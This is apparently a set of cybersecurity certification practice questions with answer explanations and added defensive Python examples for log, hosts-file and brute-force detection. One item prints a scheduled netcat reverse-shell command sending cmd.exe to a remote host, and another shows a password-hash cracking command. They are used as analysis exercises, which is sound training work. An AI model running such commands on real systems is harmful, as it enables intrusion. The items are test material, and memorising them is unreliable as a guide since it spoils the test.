Chapter 1: Domain 1: Threat Management Questions 1 - 100
51. What type of control review will focus on change management as a major element in its assessment scope? A. Operational control review B. Technical control review C. Detective control review D. Responsive control review
A. A review of operational controls will often look at change management, separation of duties and other personnel controls, and process-based controls. Many administrative controls are part of an operational control review. These are sometimes conducted as Service Organization Control (SOC) audits with SOC 1, 2, and 3 reports generated depending on the level and depth of the assessment.
74. During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened? A. Automated shunning B. Network link failure C. Back-off algorithms D. A BGP route change
A. Automated shunning, whether via an IPS or other technology, can block attackers but can also prevent penetration testers from being able to conduct scans or attacks. When planning a white-box penetration test, it is typical to discuss the presence of technologies that may block or limit the test and to either work around them or to disable them for the tester's IP addresses if they are not directly in scope.
14. Charles uses the following command while investigating a Windows workstation used by his organization's vice president of finance, who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organization's cleaning staff after hours. What does he know if the user ID shown is the only user ID able to log into the system, and he is investigating on August 12, 2017?
C:\Users\bigfish>wmic netlogin get name,lastlogon,badpasswordcount
BadPasswordCount  LastLogon                  Name
                                             NT AUTHORITY\SYSTEM
0                 20170811203748.000000-240  Finance\bigfish
A. The account has been compromised. B. No logins have occurred. C. The last login was during business hours. D. Charles cannot make any determinations from this information.
A. BadPasswordCount is 0, so there were no failed attempts, and LastLogon shows the only usable account logging in at 20:37:48 on August 11, 2017 (the trailing -240 is the UTC offset in minutes, so this is local time, UTC-4), well after business hours. Since the VP does not work at that hour, the account has most likely been compromised, and Charles should investigate how the password was obtained. (In many cases, Charles needs to ask the VP of finance about bad password habits such as writing it down or using a simple password.)
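Checking the timestamp by hand is error-prone, because wmic prints DMTF CIM_DATETIME values whose trailing offset is in minutes, not hours. The following is an added example (not from the original book) that parses that format and flags after-hours logons; the business-hours window and the reconstructed column layout of the wmic output are assumptions.

```python
import re
from datetime import datetime, time, timedelta, timezone

# DMTF CIM_DATETIME as printed by wmic: yyyymmddHHMMSS.mmmmmmsUUU
# The trailing sUUU is the UTC offset in minutes, so "-240" means UTC-4.
_CIM_RE = re.compile(r"^(\d{14})\.(\d{6})([+-])(\d{3})$")

def parse_cim_datetime(value):
    """Turn a wmic LastLogon string into a timezone-aware datetime."""
    m = _CIM_RE.match(value.strip())
    if not m:
        raise ValueError("not a CIM_DATETIME value: %r" % value)
    stamp, micros, sign, minutes = m.groups()
    offset = timedelta(minutes=int(minutes))
    if sign == "-":
        offset = -offset
    naive = datetime.strptime(stamp, "%Y%m%d%H%M%S").replace(microsecond=int(micros))
    return naive.replace(tzinfo=timezone(offset))

# Assumption for this example: the VP works 08:00-18:00, Monday to Friday.
BUSINESS_START, BUSINESS_END = time(8, 0), time(18, 0)

def outside_business_hours(dt):
    """True for weekend logons or logons outside working hours (local time of the record)."""
    return dt.weekday() >= 5 or not (BUSINESS_START <= dt.time() < BUSINESS_END)

def parse_netlogin(output):
    """Parse the fixed-width text of 'wmic netlogin get name,lastlogon,badpasswordcount'.

    Column boundaries come from the header line. Rows with an empty LastLogon
    (such as NT AUTHORITY\\SYSTEM) get last_logon=None."""
    lines = [l.rstrip() for l in output.splitlines() if l.strip()]
    header, rows = lines[0], lines[1:]
    starts = [m.start() for m in re.finditer(r"\S+", header)]
    names = [header[s:e].strip() for s, e in zip(starts, starts[1:] + [len(header)])]
    records = []
    for row in rows:
        ends = starts[1:] + [len(row)]
        fields = dict(zip(names, (row[s:e].strip() for s, e in zip(starts, ends))))
        records.append({
            "name": fields.get("Name", ""),
            "bad_password_count": int(fields["BadPasswordCount"]) if fields.get("BadPasswordCount") else None,
            "last_logon": parse_cim_datetime(fields["LastLogon"]) if fields.get("LastLogon") else None,
        })
    return records

def review_logins(output):
    """Flag accounts whose most recent logon fell outside business hours."""
    findings = []
    for rec in parse_netlogin(output):
        dt = rec["last_logon"]
        findings.append({
            "name": rec["name"],
            "bad_password_count": rec["bad_password_count"],
            "last_logon": dt.isoformat() if dt else None,
            "after_hours": outside_business_hours(dt) if dt else False,
        })
    return findings

# Constructed sample reproducing the layout of the output in the question.
SAMPLE_OUTPUT = "\n".join([
    "%-18s%-27s%s" % ("BadPasswordCount", "LastLogon", "Name"),
    "%-18s%-27s%s" % ("", "", "NT AUTHORITY\\SYSTEM"),
    "%-18s%-27s%s" % ("0", "20170811203748.000000-240", "Finance\\bigfish"),
])

if __name__ == "__main__":
    for finding in review_logins(SAMPLE_OUTPUT):
        print(finding)
```

August 11, 2017 was a Friday, so the logon is flagged purely on the time of day; a Saturday logon would be flagged by the weekday check instead.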
7. During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be? IMAGE HERE A. Determine the reason for the ports being open. B. Investigate the potentially compromised workstation. C. Run a vulnerability scan to identify vulnerable services. D. Reenable the workstation's local host firewall.
A. Cynthia's first action should be to determine whether there is a legitimate reason for the workstation to have the listed ports open.
45. Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device? IMAGE HERE A. The MAC address B. The OS flags C. The system's banner D. The IP address
A. Device manufacturer identification relies on the MAC address: its first three octets are the Organizationally Unique Identifier (OUI) assigned to the NIC vendor. Since MAC addresses can be changed in software, this is not guaranteed to be accurate, but in most cases you can reasonably expect it to match the manufacturer of the NIC. A MAC whose second hex digit is 2, 6, A, or E has the locally administered bit set, which is a hint that the address was assigned in software rather than burned in. The complete list of OUI prefixes can be found at http://standards-oui.ieee.org/oui/oui.txt.
82. Rick's manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get? A. EV B. DV C. OV D. IV
A. Extended Validation (EV) certificates require the certificate authority to verify the requester's legal identity and the operational and physical existence of the website owner, in addition to checking that the organization controls the domain name and that the person requesting the certificate has the authority to do so; the request must also be signed off by an authorized officer of the company. DV certificates only require proof of control over the domain, and OV certificates add verification of the organization's identity to that domain check. IV (individual validation) applies to certificates issued to a natural person rather than an organization and is not what a company website would use.
24. Charles wants to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organization's footprint the most? A. Limit information available via the organizational website without authentication. B. Use a secure domain registration. C. Limit technology references in job postings. D. Purge all document metadata before posting.
A. Limiting the information available about an organization by requiring authentication will strongly limit the ability of potential attackers to gather information. Secure domain registration may conceal the registration contact's information but does not provide any real additional protection. Limiting technologies listed in a job posting can help limit what attackers may find out, but most organizations would prefer to better match candidates. Finally, purging all metadata can help protect information about internal systems and devices but is difficult to enforce, and document metadata is not a primary source of information about most organizations.
71. During the reconnaissance stage of a penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and asks for information about the software and its configuration. What is this technique called? A. Pretexting B. OSINT C. A tag-out D. Profiling
A. Pretexting is a form of social engineering that relies on lies about the social engineer's motives. In this case, Fred is giving his targets reasons to believe he is legitimately a member of the organization's support team. OSINT refers to open source intelligence, which is data gathered from public sources. A tag-out sometimes refers to handing off to another member of a penetration test team, while profiling is conducted while gathering information about an individual, team, or organization before conducting a social engineering attack.
97. Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic? IMAGE HERE A. The firewall B. The router C. The distribution switch D. The Windows 2012 server
A. Since Andrea is attempting to stop external scans from gathering information about her network topology, the firewall is the best place to stop them. A well-designed ruleset can stop, or at least limit, the amount of network topology information that attackers can collect.
68. Lauren's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command: at \\workstation10 20:30 /every:F nc -nv 10.1.2.3 443 -e cmd.exe What does it do? A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. B. It uses the AT command to dial a remote host via NetBIOS. C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST.
A. The at command schedules Windows tasks. This one runs netcat every Friday at 8:30 p.m. local time, connecting out to 10.1.2.3 on port 443 and attaching cmd.exe to the connection (the -e option), which gives the remote host a reverse shell. Because the firewall allows all outbound traffic and 443 looks like HTTPS, the connection is permitted, and once it is established the remote side can send commands in over it; the inbound deny rules never come into play. Lauren should be concerned!
70. Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network? A. net use B. net user C. net group D. net config
A. The net use command will list any network shares that the workstation is using, allowing Isaac to identify file servers or others with file sharing that the workstation is configured to use. net user will show user accounts for the local PC, net group is only usable on domain controllers, and net config allows the server and workstation services to be controlled.
64. Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with the final ACK of the handshake, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using? A. SYN cookies B. ACK-ACK C. TCP frogging D. SYN replay
A. SYN cookies let a server answer a SYN with a SYN-ACK whose sequence number encodes the connection details (a keyed hash over the addresses and ports, plus a coarse timestamp and the client's MSS) instead of queuing a half-open connection. When a legitimate client completes the handshake, its ACK number returns that value, so the server can validate it and rebuild the connection state; spoofed SYNs that never complete cost the server nothing. This reduces or completely prevents the resource exhaustion a SYN flood causes, at the price of losing some TCP options that cannot be encoded in the cookie. Of course, SYN cookies do nothing against DoS attacks that go further than a SYN flood!
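To make the statelessness concrete, here is an added example (not from the original book) implementing a simplified SYN cookie in the style Linux uses: the server's ISN packs a clock tick, an MSS index and a keyed hash of the connection 4-tuple, and the returning ACK is validated by recomputing that hash. The secret, the MSS table and the 32-second tick are assumptions for the example.

```python
import hashlib
import hmac
import struct

# Assumptions for this example: a server-side secret (rotated in production),
# a small MSS table encoded in 3 bits, and a 32-second clock tick.
SECRET = b"constructed-demo-secret-rotate-me"
MSS_TABLE = (536, 1220, 1300, 1440, 1460)
TICK_SECONDS = 32

# Cookie layout (32 bits): [5-bit tick counter][3-bit MSS index][24-bit MAC]

def _tick(now):
    return int(now // TICK_SECONDS) & 0x1F

def _mac24(saddr, daddr, sport, dport, client_isn, tick, mss_idx):
    """Keyed hash binding the 4-tuple, the client's ISN, the tick and the MSS choice."""
    msg = struct.pack("!4s4sHHIBB", saddr, daddr, sport, dport, client_isn, tick, mss_idx)
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")

def make_syn_cookie(saddr, daddr, sport, dport, client_isn, client_mss, now):
    """Compute the server ISN for a SYN-ACK without storing any per-connection state."""
    tick = _tick(now)
    fits = [i for i, m in enumerate(MSS_TABLE) if m <= client_mss]
    mss_idx = fits[-1] if fits else 0      # largest table entry not above the client's MSS
    return (tick << 27) | (mss_idx << 24) | _mac24(saddr, daddr, sport, dport, client_isn, tick, mss_idx)

def check_syn_cookie(saddr, daddr, sport, dport, seq, ack, now):
    """Validate the final ACK of the handshake. Returns the MSS to use, or None if the cookie is bad."""
    client_isn = (seq - 1) & 0xFFFFFFFF    # the ACK's seq is the client's ISN + 1
    cookie = (ack - 1) & 0xFFFFFFFF        # the ACK number is our ISN + 1
    tick, mss_idx, mac = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
    if mss_idx >= len(MSS_TABLE):
        return None
    current = _tick(now)
    if tick not in (current, (current - 1) & 0x1F):   # accept only the current and previous tick
        return None
    expected = _mac24(saddr, daddr, sport, dport, client_isn, tick, mss_idx)
    if not hmac.compare_digest(expected.to_bytes(3, "big"), mac.to_bytes(3, "big")):
        return None
    return MSS_TABLE[mss_idx]

def handle_syn(saddr, daddr, sport, dport, client_isn, client_mss, now):
    """What the server sends back: a SYN-ACK whose seq is the cookie. Nothing is queued."""
    cookie = make_syn_cookie(saddr, daddr, sport, dport, client_isn, client_mss, now)
    return {"flags": "SYN-ACK", "seq": cookie, "ack": (client_isn + 1) & 0xFFFFFFFF}

if __name__ == "__main__":
    s, d = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])
    synack = handle_syn(s, d, 40000, 80, 12345, 1460, 1000.0)
    print("SYN-ACK", synack)
    print("client ACK accepted, MSS =", check_syn_cookie(s, d, 40000, 80, 12346, synack["seq"] + 1, 1010.0))
```

The real Linux implementation additionally folds in a second hash and recovers options such as window scaling and SACK from the TCP timestamp option, but the shape is the same: nothing is stored between the SYN and the ACK, and a forged or stale ACK fails the recomputation.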
2. During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organization's network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option? A. Perform a DNS brute-force attack. B. Use an nmap ping sweep. C. Perform a DNS zone transfer. D. Use an nmap stealth scan.
A. While it may seem strange, a DNS brute-force attack that queries a list of IPs, common subdomains, or other lists of targets will often bypass intrusion detection and prevention systems that do not pay particular attention to DNS queries. Cynthia may even be able to find a DNS server that is not protected by the organization's IPS! nmap scans are commonly used during reconnaissance, and Cynthia can expect them to be detected since they are harder to conceal. Cynthia shouldn't expect to be able to perform a zone transfer, and if she can, a well-configured IPS should immediately flag the event.
49. Which of the following tools can be used to passively gather the information required to generate a network topology map? A. Wireshark B. nmap C. SolarWinds Network Mapper D. Nessus
A. Wireshark can be used to capture network traffic, allowing you to review traffic information to build a network topology based on time to live, IP addresses, and other information. nmap and SolarWinds Network Mapper both rely on active scans to generate topologies, and Nessus does not provide a network topology generation capability.
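One passive technique that captured traffic supports is hop-distance inference from the IP TTL: a sender's TTL starts at a conventional initial value (64, 128 or 255) and is decremented once per router, so the difference gives the number of hops to the capture point. The following added example (not from the original book) does this over a constructed list of (source IP, TTL) pairs; the /24 grouping is an assumption. Caveat: NAT devices and firewalls can rewrite TTLs, and an observed value just below 128 could come from a nearby 128-TTL host or a very distant 255-TTL one, so treat the result as an estimate to confirm with other evidence.

```python
from collections import defaultdict
from ipaddress import ip_network

# Conventional initial TTLs: 64 (Linux, macOS, most Unix), 128 (Windows), 255 (network gear, Solaris).
INITIAL_TTLS = (64, 128, 255)

def infer_hops(observed_ttl):
    """Guess the sender's initial TTL and how many routers the packet crossed to reach the capture point."""
    if not 1 <= observed_ttl <= 255:
        raise ValueError("TTL out of range")
    initial = min(t for t in INITIAL_TTLS if t >= observed_ttl)
    return initial, initial - observed_ttl

def build_topology(packets, prefixlen=24):
    """Group source hosts by inferred hop distance and subnet from (src_ip, ttl) tuples.

    Returns {hops: {subnet: {host: initial_ttl}}}. A host seen with several TTLs is recorded
    at its smallest hop count, since the shorter path is the more credible measurement."""
    best = {}
    for src, ttl in packets:
        initial, hops = infer_hops(ttl)
        if src not in best or hops < best[src][1]:
            best[src] = (initial, hops)
    topo = defaultdict(lambda: defaultdict(dict))
    for src, (initial, hops) in best.items():
        subnet = str(ip_network("%s/%d" % (src, prefixlen), strict=False))
        topo[hops][subnet][src] = initial
    return {h: {s: dict(hosts) for s, hosts in subs.items()} for h, subs in topo.items()}

# Constructed sample of source addresses and TTLs as Wireshark would show them.
SAMPLE_PACKETS = [
    ("10.0.1.10", 64),    # Linux host on the capture segment
    ("10.0.1.20", 128),   # Windows host on the capture segment
    ("10.0.2.5", 63),     # Linux host one router away
    ("10.0.2.6", 127),    # Windows host one router away
    ("10.0.9.1", 254),    # router or appliance one hop away (initial TTL 255)
    ("10.0.3.7", 61),     # three hops away
    ("10.0.2.5", 62),     # same host seen via a longer path; the shorter one wins
]

if __name__ == "__main__":
    for hops, subnets in sorted(build_topology(SAMPLE_PACKETS).items()):
        print("%d hop(s):" % hops)
        for subnet, hosts in sorted(subnets.items()):
            print("  %s -> %s" % (subnet, ", ".join("%s (TTL %d)" % hv for hv in sorted(hosts.items()))))
```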
16. Angela is designing her organization's data center network and wants to establish a secure zone and a DMZ. If Angela wants to ensure that user accounts and traffic that manage systems in the DMZ are easily auditable and that all access can be logged while helping prevent negative impacts from compromised or infected workstations, which of the following solutions is Angela's best design option? A. Administrative virtual machines run on administrator workstations B. A jump host C. A bastion host D. Use ssh or RDP from administrative workstations
B. A jump host, or jump box, allows for easier logging of administrative access and can serve as an additional layer of protection between administrative workstations and the protected network. In this case, Angela's needs are best served by a jump host. Bastion hosts are fully exposed to attacks; administrative virtual machines can be useful but don't make central auditing quite as easy and may allow a compromised virtual machine host to be a problem. Finally, direct ssh or RDP requires auditing of all administrative workstations and could allow a compromised workstation to cause issues by allowing it to directly connect to the secure network.
58. Alice believes that one of her users may be taking malicious action on the systems she has access to. When she walks past her user's desktop, she sees the following command on the screen: user12@workstation:/home/user12# ./john -wordfile:/home/user12/mylist.txt -format:lm hash.txt What is the user attempting to do? A. They are attempting to hash a file. B. They are attempting to crack hashed passwords. C. They are attempting to crack encrypted passwords. D. They are attempting a pass-the-hash attack.
B. Alice's suspicious user appears to be attempting to crack LAN Manager (LM) password hashes using a custom word list. The key clues are the john application (John the Ripper), the -format:lm option, and the location of the word list. LM hashes are a soft target: the password is uppercased and split into two independent 7-character halves before hashing, so even long passwords fall quickly.
65. What two phases of the NIST penetration testing cycle are often repeated during a test? A. Planning and discovery B. Discovery and attack C. Planning and attack D. Discovery and reporting
B. As attacks succeed, they will often create additional opportunities for discovery, resulting in more attacks. Planning the test itself, as well as the final reporting phase, should occur only once per penetration test.
30. Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process? A. WHOIS lookups B. Banner grabbing C. BGP looking glass usage D. Registrar checks
B. Banner grabbing is an active process and requires a connection to a remote host to grab the banner. The other methods are all passive and use third-party information that does not require a direct lookup against a remote host.
34. As part of an organization-wide red team exercise, Frank is able to use a known vulnerability to compromise an Apache web server. Once he has gained access, what should his next step be if he wants to use the system to pivot to protected systems behind the DMZ that the web server resides in? A. Vulnerability scanning B. Privilege escalation C. Patching D. Installing additional tools
B. By default Apache does not run as an administrative user; it typically runs as a limited service account. To take further useful action, Frank should look for a privilege escalation path that will allow him to gain the access he needs to pivot.
43. Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action? A. # iptables -P INPUT DROP B. # iptables -P SERVICE DROP C. # iptables -P OUTPUT DROP D. # iptables -P FORWARD DROP
B. By default, the iptables filter table has INPUT, OUTPUT, and FORWARD chains; there is no SERVICE chain. Geoff should set the default policy of all three chains to DROP (iptables -P CHAIN DROP), which discards any packet that no rule explicitly accepts, to stop all traffic to, from, or through the machine. Note that -P only changes the policy: any existing ACCEPT rules in the chains would still match first and should be flushed as well.
57. While investigating a malware infection, Lauren discovers that the hosts file for the system she is reviewing contains multiple entries, as shown here:
0.0.0.0 symantec.com
0.0.0.0 mcafee.com
0.0.0.0 microsoft.com
0.0.0.0 kaspersky.com
Why would the malware make this change? A. To redirect 0.0.0.0 to known sites B. To prevent antivirus updates C. To prevent other attackers from compromising the system D. To enable remote access to the system
B. Malware has long modified the hosts file to block antivirus and operating system updates: because the hosts file is consulted before DNS, pointing the vendors' domains at 0.0.0.0 makes their update servers unreachable. Lauren should check whether the antivirus on the system is up to date but will probably need to recommend a rebuild or reinstallation of the system.
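An added example (not from the original book) of detecting this tactic: it parses hosts-file text and reports entries that point a security vendor's domain at a sinkhole address. The vendor watchlist and the sample hosts file are constructed.

```python
# Constructed watchlist: domains whose sinkholing in the hosts file is a classic update-blocking trick.
SECURITY_VENDOR_DOMAINS = {"symantec.com", "mcafee.com", "microsoft.com", "kaspersky.com", "windowsupdate.com"}
SINKHOLE_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::1"}

def parse_hosts(text):
    """Yield (address, hostname) pairs from hosts-file text, ignoring comments and blank lines.

    A single line may map several names to one address, so each name is yielded separately."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        for name in parts[1:]:
            yield parts[0], name.lower()

def _on_watchlist(name):
    return any(name == d or name.endswith("." + d) for d in SECURITY_VENDOR_DOMAINS)

def find_sinkholed_vendors(text):
    """Return hosts-file entries that point a watched vendor name at a sinkhole address."""
    return [(addr, name) for addr, name in parse_hosts(text)
            if addr in SINKHOLE_ADDRESSES and _on_watchlist(name)]

# Constructed sample hosts file with the entries from the question plus benign lines.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1       localhost
0.0.0.0 symantec.com
0.0.0.0 mcafee.com
0.0.0.0 microsoft.com
0.0.0.0 kaspersky.com liveupdate.symantec.com
10.0.0.5 intranet.example.com   # legitimate internal override
"""

if __name__ == "__main__":
    for addr, name in find_sinkholed_vendors(SAMPLE_HOSTS):
        print("sinkholed:", addr, name)
```

The localhost line is ignored because localhost is not on the watchlist, and the intranet override is ignored because it points at a real address; only the vendor domains redirected to 0.0.0.0 are reported.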
89. Chris discovers the following entries in /var/log/auth.log. What is most likely occurring? IMAGE HERE A. A user has forgotten their password. B. A brute-force attack against the root account C. A misconfigured service D. A denial-of-service attack against the root account
B. Repeated authentication failures against root from the same remote host in a short period indicate a brute-force attack against the root account. A user who has forgotten their password produces a handful of failures from a known workstation, not a sustained stream from a single external address.
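Since the figure is not reproduced here, the following added example (not from the original book) shows the detection logic over constructed auth.log lines: it counts sshd "Failed password" events per (source IP, user) inside a sliding time window and reports pairs that exceed a threshold. The threshold, window and log year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches the classic sshd failure line: "Failed password for [invalid user] NAME from IP port N ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_failures(lines, year=2017):
    """Extract (timestamp, user, source_ip) from sshd failed-password lines; other lines are skipped.

    Syslog timestamps carry no year, so the caller supplies it (assumed 2017 here)."""
    out = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
            out.append((ts, m.group("user"), m.group("ip")))
    return out

def detect_bruteforce(lines, threshold=5, window_seconds=60, year=2017):
    """Flag (source_ip, user) pairs with at least `threshold` failures inside any `window_seconds` span.

    Returns {(ip, user): peak_failures_in_window}. One or two failures look like a forgotten
    password; a burst from one host in under a minute is a brute-force attempt."""
    events = defaultdict(list)
    for ts, user, ip in parse_failures(lines, year):
        events[(ip, user)].append(ts)
    findings = {}
    for key, times in events.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            findings[key] = peak
    return findings

# Constructed sample lines in auth.log format (not the page's figure).
SAMPLE_AUTH_LOG = [
    "Aug 12 02:14:01 web01 sshd[2310]: Failed password for root from 203.0.113.45 port 51122 ssh2",
    "Aug 12 02:14:03 web01 sshd[2310]: Failed password for root from 203.0.113.45 port 51122 ssh2",
    "Aug 12 02:14:04 web01 sshd[2312]: Failed password for root from 203.0.113.45 port 51130 ssh2",
    "Aug 12 02:14:06 web01 sshd[2314]: Failed password for root from 203.0.113.45 port 51138 ssh2",
    "Aug 12 02:14:07 web01 sshd[2316]: Failed password for root from 203.0.113.45 port 51142 ssh2",
    "Aug 12 02:14:09 web01 sshd[2318]: Failed password for root from 203.0.113.45 port 51150 ssh2",
    "Aug 12 02:14:10 web01 sshd[2320]: Failed password for invalid user admin from 203.0.113.45 port 51158 ssh2",
    "Aug 12 09:02:11 web01 sshd[2402]: Failed password for alice from 10.0.0.7 port 40022 ssh2",
    "Aug 12 09:02:19 web01 sshd[2402]: Accepted password for alice from 10.0.0.7 port 40022 ssh2",
]

if __name__ == "__main__":
    for (ip, user), count in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print("brute force: %s -> %s (%d failures within 60s)" % (ip, user, count))
```

Keying on the (IP, user) pair rather than the IP alone separates a password-guessing run against root from a password-spraying run that touches many accounts once each; the latter needs a per-IP count across users, which is a one-line change to the grouping key.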
55. While reviewing the Wireshark packet capture shown here, Ryan notes an extended session using the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person? IMAGE HERE A. An encrypted RAT B. A VPN application C. A secure web browser D. A base64-encoded packet transfer utility
B. ESP (Encapsulating Security Payload) packets are part of the IPsec protocol suite and are typically associated with a VPN tunnel, which is why Ryan cannot read their contents. Ryan should check for a VPN application and determine what service or system the user may have connected to.
67. Lauren is performing passive intelligence gathering and discovers a directory filled with photos taken by her target organization's staff. If she wants to review the metadata from the photos, what tool can she use to do so? A. Strings B. Exiftool C. Wireshark D. Stegdetect
B. Exiftool provides access to image and document metadata, including information about the camera, geotagging, time and date information, and a variety of other useful metadata if it is present. Strings is useful for pulling text from files but does not provide usefully formatted metadata. Wireshark is a packet capture utility, and stegdetect is used to detect steganographically concealed data in files.
6. Maria wants to deploy an anti-malware tool to detect zero-day malware. What type of detection method should she look for in her selected tool? A. Signature based B. Heuristic based C. Trend based D. Availability based
B. Heuristic detection methods analyze what a program does, often by running it in a sandbox and tracking its behavior, rather than matching it against signatures of known malware. This allows the anti-malware tool to determine whether the behaviors and actions of the program match those common to malware, even if the file does not match the fingerprint of any known malware package, which is what detecting zero-day malware requires.
Use the following network diagram and scenario to answer the next three questions: IMAGE HERE Lauren is a security analyst who has been tasked with performing nmap scans of her organization's network. She is a new hire and has been given this logical diagram of the organization's network but has not been provided with any additional detail. 96. Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact? A. Location A B. Location B C. Location C D. Location D
B. Lauren will see the most important information about her organization at location B, which provides a view of data center servers behind the data center firewall. To get more information, she should request that the client network firewall ruleset include a rule allowing her scanner to scan through the firewall to all ports for all systems on all protocols.
94. Using the same network diagram and scenario as above, Lauren wants to determine what IP addresses to scan from location A. How can she find this information? A. Scan the organization's web server and then scan the other 255 IP addresses in its subnet. B. Query DNS to find her organization's registered hosts. C. Contact ICANN to request the data. D. Use traceroute to identify the network that the organization's domain resides in.
B. Lauren's best option from this list is to query DNS for her organization's registered hosts; in practice she would pair that with WHOIS lookups on the domain and its address space, which show the netblocks actually registered to the organization. She might also choose to use a BGP looking glass, but most of the information she will need will be in DNS and WHOIS. If she simply scans the /24 that the web server is in, she may end up scanning a third-party hosting provider or other systems that aren't owned by her organization. Contacting ICANN isn't necessary when WHOIS is available, and depending on what country Lauren is in, ICANN may not have the data she wants. Finally, traceroute will only show the path to the single system she queries; she needs more data to perform a useful scan in most instances.
73. Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior? A. A firewall B. A netflow collector C. A honeypot D. A BGP monitor
B. Network flows can be used to identify traffic patterns between systems that are atypical or that connect to systems that are known malware or malicious sites. Using his SIEM, Lucca can look for top talkers, behavior or trend-based anomalies, or other correlations that point to an issue.
41. The company that Lauren works for is making significant investments in infrastructureas-a-service hosting to replace its traditional data center. Members of her organization's management have expressed concerns about data remanence when Lauren's team moves from one virtual host to another in their cloud service provider's environment. What should she instruct her team to do to avoid this concern? A. Zero-wipe drives before moving systems. B. Use full-disk encryption. C. Use data masking. D. Span multiple virtual disks to fragment data
B. Lauren's team should use full-disk encryption or volume encryption and should secure the encryption keys properly. This will ensure that any data that remains cannot be exposed to future users of the virtual infrastructure. While many cloud providers have implemented technology to ensure that this won't happen, Lauren can avoid any potential issues by ensuring that she has taken proactive action to prevent data exposure. Using a zero wipe is often impossible because virtual environments may move without her team's intervention, data masking will not prevent unmasked data or temporary data stored on the virtual disks from being exposed, and spanning multiple virtual disks will still leave data accessible, albeit possibly in fragmented form.
44. The company that Dan works for has recently migrated to a SaaS provider for its enterprise resource planning (ERP) software. In its traditional on-site ERP environment, Dan conducted regular port scans to help with security validation for the systems. What will Dan most likely have to do in this new environment? A. Use a different scanning tool. B. Rely on vendor testing and audits. C. Engage a third-party tester. D. Use a VPN to scan inside the vendor's security perimeter
B. Most SaaS providers do not want their customers conducting port scans of their service, and many are glad to provide security assertions and attestations including audits, testing information, or contractual language that addresses potential security issues. Using a different scanning tool, engaging a third-party tester, or even using a VPN are not typically valid answers in a scenario like this.
47. Eric believes that his organization has a number of vulnerable systems that have been scanned by third parties. If he wants to check publicly available vulnerability information, which of the following methods are best suited to performing this type of passive reconnaissance? A. Use the worldwide nmap database. B. Search for his domain in Shodan. C. Use the OpenVAS central vulnerability data repository. D. Check against the CVE database for his domain.
B. Of these answers, only Shodan provides a searchable index of Internet-exposed hosts, including the service banners and versions observed when each system was scanned, which is what makes it useful for spotting vulnerable systems without touching them. OpenVAS, CVE, and nmap do not provide central databases of scanned hosts; CVE catalogs vulnerabilities, not the systems that have them.
52. As part of her reconnaissance process for her organization's internal security review, Olivia uses Shodan to search for hosts within her target's IP range. She discovers the following Shodan entry listing for one of her target's devices. What should she do with this information? IMAGE HERE A. Activate the incident response process. B. Contact the device administrator. C. Log in to validate the finding. D. Nothing, because this is a false positive.
B. Olivia's first action should be to contact the device administrator. There is no indication that the device has been compromised, and logging in to validate the finding is not typically part of a reconnaissance process.
92. Which of the following capabilities is not a typical part of an SIEM system? A. Alerting B. Performance management C. Data aggregation D. Log retention
B. SIEM systems typically provide alerting, event and log correlation, compliance data gathering and reporting, data and log aggregation, and data retention capabilities. This also means that they can be used for forensic analysis as they should be designed to provide a secure copy of data. They do not typically provide performance management-specific capabilities.
25. Cassandra's nmap scan of an open wireless network (192.168.1.0/24) shows the following host at IP address 192.168.1.1. Which of the following is most likely to be the type of system at that IP address based on the scan results shown? IMAGE HERE A. A virtual machine B. A wireless router C. A broadband router D. A print server
